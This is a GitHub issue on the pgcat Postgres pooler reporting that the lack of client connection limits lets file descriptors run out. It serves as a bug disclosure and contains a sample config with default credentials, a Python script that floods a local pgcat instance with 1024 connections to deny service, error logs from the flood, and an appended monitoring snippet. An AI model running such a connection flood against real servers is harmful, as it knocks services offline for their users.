postgresml/pgcat

No Client Connection Limits

Opened this issue · 0 comments

Describe the bug
Linux places a max on the number of files a process can have open at a given time. This limit can be seen using the command ulimit -n. I believe the default for most distros is 1024 (this is the case on my NixOS setup), but this number is very low and can be increased.

The problem with this with regard to pgcat is that every time a client opens a connection, pgcat opens a new file. I do not believe (please correct me if I am wrong about this) there is a way to limit client connections in pgbouncer, and because of this it is possible for any client to DoS the pgcat server.

To Reproduce
Verify max file descriptors

ulimit -n

[general]
host = "0.0.0.0"
port = 6433
admin_username = "pgcat"
admin_password = "pgcat"

[pools.pgml.users.0]
username = "postgres"
password = "postgres"
pool_size = 10
min_pool_size = 1
pool_mode = "transaction"

[pools.pgml.shards.0]
servers = [
  ["127.0.0.1", 9876, "primary"]
]
database = "postgres"

Python script to DoS pgcat server

import psycopg2


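# Open one client connection to pgcat using the credentials from the config above.
def connect() -> psycopg2.extensions.connection: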
  pg_connection_dict = {
    'dbname': 'pgml',
    'password': 'postgres',
    'user': 'postgres',
    'port': 6433,
    'host': '127.0.0.1'
  }
  return psycopg2.connect(**pg_connection_dict)


def ulimit_test():
  connections = []

  for _ in range(1024):
    conn = connect()
    connections.append(conn)

  for conn in connections:
    conn.close()


def main() -> None:
  ulimit_test()


if __name__ == '__main__':
  main()

pgcat error logs on being DOS'd

...
2024-09-05T18:29:11.673340Z ERROR ThreadId(01) pgcat: Os { code: 24, kind: Uncategorized, message: "Too many open files" }
2024-09-05T18:29:11.673376Z ERROR ThreadId(01) pgcat: Os { code: 24, kind: Uncategorized, message: "Too many open files" }
2024-09-05T18:29:11.673398Z ERROR ThreadId(01) pgcat: Os { code: 24, kind: Uncategorized, message: "Too many open files" }
...

Expected behavior
There should be a way to limit client connections in pgbouncer to prevent the possibility of being DOS'd.

Desktop (please complete the following information):

  • OS: Rocky9 Linux
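
An added monitoring example, not part of the original issue or the pgcat code base: it picks out the EMFILE (errno 24) lines in the log format shown above and compares a process's open descriptors with its soft "Max open files" limit read from Linux /proc. The function names, the constructed INFO line and the 0.8 warning ratio are assumptions made for illustration.

```python
import os
import re
from pathlib import Path

# Two ERROR lines copied from the issue's log excerpt; the INFO line is constructed.
SAMPLE_LOG = """\
2024-09-05T18:29:11.673340Z ERROR ThreadId(01) pgcat: Os { code: 24, kind: Uncategorized, message: "Too many open files" }
2024-09-05T18:29:11.673376Z ERROR ThreadId(01) pgcat: Os { code: 24, kind: Uncategorized, message: "Too many open files" }
2024-09-05T18:29:12.000000Z INFO ThreadId(01) pgcat: constructed non-error line
"""

# EMFILE is errno 24 on Linux; match the "Os { code: 24" form seen in the issue's logs.
EMFILE_RE = re.compile(r"^(\S+)\s+ERROR\b.*\bOs \{ code: 24\b")

def emfile_events(log_text):
    """Return the timestamps of log lines that report descriptor exhaustion."""
    return [m.group(1) for line in log_text.splitlines()
            if (m := EMFILE_RE.match(line))]

def parse_soft_nofile(limits_text):
    """Extract the soft 'Max open files' value from /proc/<pid>/limits text."""
    for line in limits_text.splitlines():
        if line.startswith("Max open files"):
            soft = line.split()[3]  # columns: Max open files <soft> <hard> files
            return None if soft == "unlimited" else int(soft)
    raise ValueError("no 'Max open files' row found")

def fd_headroom(pid, warn_ratio=0.8):
    """Compare a process's open descriptors with its soft limit (Linux only)."""
    proc = Path("/proc") / str(pid)
    soft = parse_soft_nofile((proc / "limits").read_text())
    used = len(os.listdir(proc / "fd"))
    return {"used": used, "soft_limit": soft,
            "warn": soft is not None and used >= warn_ratio * soft}

if __name__ == "__main__":
    print(emfile_events(SAMPLE_LOG))
    # Checks this script's own process; pass the pooler's PID in practice.
    print(fd_headroom(os.getpid()))
```

Reading another user's /proc/<pid>/fd requires running as that user or as root.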